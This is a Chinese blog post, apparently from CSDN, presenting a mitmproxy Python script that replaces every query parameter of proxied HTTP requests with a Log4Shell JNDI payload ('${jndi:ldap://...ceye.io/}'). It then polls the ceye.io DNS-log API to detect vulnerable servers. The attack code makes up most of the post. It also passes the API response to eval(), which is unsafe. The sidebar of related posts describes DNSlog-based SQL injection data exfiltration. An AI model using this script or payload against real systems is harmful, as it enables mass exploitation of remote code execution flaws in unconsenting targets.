ceye-dnslog

已于 2024-01-18 11:22:25 修改
阅读量396 收藏 9
点赞数 9
文章标签: python 网络安全 log4j
于 2024-01-14 20:52:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55885866/article/details/135588426
版权

curl "http://api.ceye.io/v1/records?token=xxx&type=dns"

获取数据结合脚本。

from mitmproxy import http, ctx
import requests
import time


def check_shuju(json_string):
    print(json_string)
    names = [item["name"] for item in json_string["data"]]
    unique_names = list(set(names))
    print(unique_names)
def send_get_request(url):
    try:
        response = requests.get(url)

        # 检查请求是否成功
        response.raise_for_status()

        # 打印响应内容
        return  response.text

    except requests.exceptions.RequestException as err:
        print(f"发生错误: {err}")



def request(flow: http.HTTPFlow) -> None:
    url = flow.request.url

    # 检查是否为 http://detectportal.firefox.com/success.txt
    if "http://detectportal.firefox.com/success.txt" in url:
        print("Skipping request to http://detectportal.firefox.com/success.txt")
        # 返回,不继续处理此请求
        return
    # 获取原始参数
    original_params = flow.request.query
    # 遍历每个参数
    for param_name, param_value in original_params.items():
        # 创建一个新的参数字典,用于更改参数
        new_params = original_params.copy()
        # 更改当前参数的值
        time_s = str(time.time()*1000)

        new_params[param_name] = "${jndi:ldap://"+time_s+"."+"xxx.ceye.io/}"

        # 更新请求的参数
        flow.request.query = new_params
        # 打印更改后的参数
        print("Updated Params:", flow.request.url)
        #写入文件记录
        with open("result.txt", "a") as file:
            file.writelines(time_s+"idf6ss.ceye.io"+" "+flow.request.url+" "+str(flow.request.query)+"\n")
        # 继续发送请求
        flow.resume()


def response(flow: http.HTTPFlow) -> None:
    # 在这里添加处理响应的逻辑
    a = send_get_request("http://api.ceye.io/v1/records?token=&type=dns")

    check_shuju(eval(a))
# 启动mitmproxy代理服务器
if __name__ == "__main__":
    from mitmproxy.tools.main import mitmdump
    mitmdump(['-p', '7777', '-s', __file__])

开始后测试每个参数 后查看ceye平台看看是否出现问题

hzyyyyyyyu
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
dnsgo:小型,可爱的DNS服务器。 使用它来测试Web安全性,例如dnslogdns重新绑定。 有点像ceye.io
04-29
dnsgo 那是什么? 这是一台dns服务器,您可以在需要使用自己的dns服务器时使用它。 在哪里使用? 将其用作网站的名称服务器(现在仅支持“ A”记录)。 在内部网络中使用它。 如快速的dns缓存服务器。...
mysql dnslog_mysql-dnslog注入
weixin_39836751的博客
01-19 221
@Adminxednslog原理简介:简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入。mysql下的...
mysql-dnslog注入
Adminxe的博客
05-05 1822
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
mysql dnslog_MYSQL-DNSlog注入
weixin_35219046的博客
01-19 83
然后加入?Id=1以及一系列单引号,and order sleep()之类的测试发现好多都被禁止。发现sleep()函数被执行了,安全狗被绕过。然后使用load_file()函数进行mysql-dns注入:59.63.200.79:8014/index3.php/1.txt?id=1and (select load_file(concat(‘//‘,(selectdatabase()),’.erg...
SQL注入-DNSlog注入(手工加工具使用)
BING
04-17 6581
DNSlog注入
CEye.rar_CEye_改变脸部
09-20
这是本人自己写的小程序,通过点击图标来改变脸部表情。希望对初学者有用。
sql_lab_第5关 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相关下载链接:https://github.com/Audi-1/sqli-labs
gopoc:用cel-go重现了长亭xray的poc检测功能的轮子
03-20
目前只支持ceye.io作为反连的验证平台,适合小规模批量验证。我不知道怎么实现类型注入 另外,如果双方只能在同一个内网才能互通,估计得用http路径来分辨了,这个后期再完善。 支持多种检测方式一对一,分开目标...
SharpNetCheck:内置网渗透过程中,对可以出网的机器是十分渴望的。在收集大量弱密码的情况下,一个人去测试能不能出网太麻烦了。所以就有了这个工具,可配合如wmiexec ,psexec等横向工具进行批量检测,该工具可以在dnslog中回显内网IP地址和计算机名,可实现内网中的快速定位可出网机器
03-21
所以就有了这个工具,可配合如wmiexec,psexec等横向工具进行批量检测,该工具可以在dnslog中回显内网IP地址和计算机名,可实现内网中的快速定位可出网机器。 > SharpNetCheck.exe Author: Uknow Github: ...
【hackmyvm】Slowman靶机
woshicainiao666的博客
05-20 1527
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
Python 具体能干什么?
最新发布
猿小白的博客
05-26 558
Python 是一种功能强大、用途广泛的编程语言,因其简洁易读的语法和丰富的库生态系统而备受欢迎。
python中用“*”运算符复制列表时子列表实际上引用的是同一个列表,列表和嵌套列表的坑
ThreeS_tones的博客
05-21 791
当你修改了一个子列表的元素时,所有的子列表都会随之改变。因为他们实际上都是同一个子列表的引用。输出如下,可以看到每个子列表中的第5个元素相同,并没有实现从0.8-1.2分布。先看一个例子,我想改变load的子列表中第五个元素,从0.8-1.2分布。的时候,Python实际上。
Python编程从入门到实践》day36
m0_37565294的博客
05-22 1319
我们要编写一个名为“学习笔记”的Web应用程序,让用户能够记录感兴趣的主题,并在学习每个主题的过程中添加日志条目。django-admin startproject learning_log . # 新建一个名为learning_log的项目,末尾的句点让新项目使用合适的目录结构。运行命令ls,其输出表明Django有创建一个db.sqlite3.SQLite使用一种使用单个文件的数据库。# 包含4个文件(settings.py、urls.py、wsgi.py、__init__.py)
python梯度下降法求解三元线性回归系数,并绘制结果
2401_82997545的博客
05-25 449
theta = np.random.randn(4, 1) # 初始化参数。n_iterations = 1000 # 迭代次数。print("得到的参数为:", theta)# 梯度下降求解多元线性回归系数。eta = 0.1 # 学习率。m = 100 # 样本数。
nss刷题(关于ssti)
2302_79119987的博客
05-23 1087
-script-args n1=v1,... : 给脚本传递参数. ie. --script-args grep.regex="<A href=\"(.*?--hc/hl/hw/hh N[,N]+ : 以指定的返回码/行数/字数/字符数作为判断条件隐藏返回结果 (用 BBB 来接收 baseline)--sc/sl/sw/sh N[,N]+ : 以指定的返回码/行数/字数/字符数作为判断条件显示返回结果 (用 BBB 来接收 baseline)
提取COCO 数据集的部分类
qq_53682472的博客
05-24 500
若报错,pip install git+https://github.com/philferriere/cocoapi.git#subdirectory=PythonAPI。注意skimage用pip install scikit-image -i https://pypi.tuna.tsinghua.edu.cn/simple。安装pycocotools github地址:https://github.com/philferriere/cocoapi。实在不行的话,手动下载。
pytest:指定测试用例执行顺序
blues_C的博客
05-22 803
在自动化测试中,测试用例的执行顺序有时对测试结果具有重要影响。本文将介绍如何在pytest框架中使用插件以及Collection hooks来控制测试用例的执行顺序。
微信小程序uniapp+django洗脚按摩足浴城消费系统springboot
QQ1304979694的博客
05-24 529
Python语言官方规范访问数据库的统一接口规范(Python DB-API),防止在使用不同数据库时,由于底层数据库技术不同造成接口程序紊乱的问题。(3)项目初期开发,美工设计,前端实现,开发信息系统的用户功能的实现,完善界面排版,实现信息提取发送等一系列功能。项目系统最后阶段的修改及最终测试运行。当然,在研究过程中也可以直接调查,对调查搜集到的资料进行综合分析、比较,调查法是科学研究中普遍的研究方法。(5)系统测试:对设计好的程序进行最终调试,通过调试发现存在的问题并解决,从而达到完善系统的目的。
dnslogceye怎么使用
07-27
C知道:要使用dnslogceye,你可以按照以下步骤进行操作: 1. 首先,你需要注册一个ceye账号。可以访问ceye.io官方网站进行注册。 2. 注册成功后,登录你的ceye账号。 3. 在ceye.io的控制台中,你可以看到一个"DNS"选项卡。点击进入该选项卡。 4. 在DNS选项卡中,你可以看到一个"添加域名"按钮。点击该按钮,输入你想要监控的域名,并选择DNS协议。 5. 添加域名后,ceye会为你生成一个唯一的DNS记录。 6. 点击该DNS记录,你可以查看该记录的解析结果和访问日志。 7. 你可以将该DNS记录添加到你的应用程序或者网络设备中,并观察访问日志来监控DNS解析情况。 请注意,使用ceyeDNS记录需要将其添加到你的应用程序或网络设备中,并确保能够正常解析。同时,ceye还提供了其他功能,如HTTP、SMTP、FTP等协议的监控,你可以根据需要选择相应的功能进行使用。希望对你有所帮助!如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值